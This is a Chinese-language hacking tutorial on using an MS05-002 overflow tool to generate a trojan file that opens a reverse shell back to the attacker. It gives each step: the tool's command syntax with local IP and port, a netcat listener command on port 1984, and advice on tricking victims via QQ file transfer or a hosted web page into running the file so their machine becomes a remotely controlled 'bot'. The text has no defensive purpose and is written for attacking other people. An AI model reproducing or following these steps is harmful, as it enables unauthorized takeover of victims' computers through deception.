利用Ms05002溢出找“肉鸡”

溢出攻击永远是安全界中，不可忽视的角色。而如今也正是肉鸡短缺的年代，能掌握一门最新的Ms05002溢出，必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

实施方法：通过Ms05002攻击工具，溢出反弹IP、反弹端口，会生成含有木马性质的文件。然后将这个产生的文件，以QQ传输的形式发给受害者观看，或者将其上传到自己的主页空间，引诱其他人访问。最后执行NC瑞士军刀，监听本机端口，收取已经运行产生文件的主机。

步骤1．首先从网上下载Ms05002溢出工具，释放到比较理想的硬盘驱动器中，然后在CMD命令行下，输入软件名称启动该程序，会出现一些英文形式的帮助信息(如图1)。

小提示：Ms05002溢出工具，是一款需要在命令行下支持运行的程序，它可以通过溢出反弹的IP地址，生成木马服务端。这点与其他溢出程序是完全不同，而且效率相比之下，也有明显的提高，真不愧是即所有溢出程序的升级版本。

步骤2．继续在其下的命令行处，输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2)，然后敲击“回车键”执行。屏幕会不停的向上滚动，这时还会出现带有两句“OK”的字母提示，说明木马文件已经生成完毕了。

步骤3．通常溢出过后，都需要监听工具来抓捕肉鸡。这里也不例外，跳转到事先准备的NC工具所在目录，然后在其命令行处输入NC –VV –L –P 1984的监听命令，并敲击“回车”键，开始监听本地1984端口的信息出入。

小提示：NC监听软件-VV参数代表，得到更详细的输入监听内容。-L代表连接端口关闭后，仍然继续监听。-P进行监听本地端口，后跟数字就是所要监听的端口号。

步骤4.将溢出生成的木马，以QQ形式发给网友运行，或者上传到自己的个人空间中，骗取受害者浏览运行。如果用户不幸查看所发去的木马，正在本机监听的NC等待状况，就会改为可操作命令行(如图3)。而此时的命令操作平台，也正是远方主机的SHELL平台(有关SHELL的解释，已经在前几篇文章中叙述过，这里就不做过多讲解了)，现在你就可以在其主机上，为所欲为的以命令形式操控机器。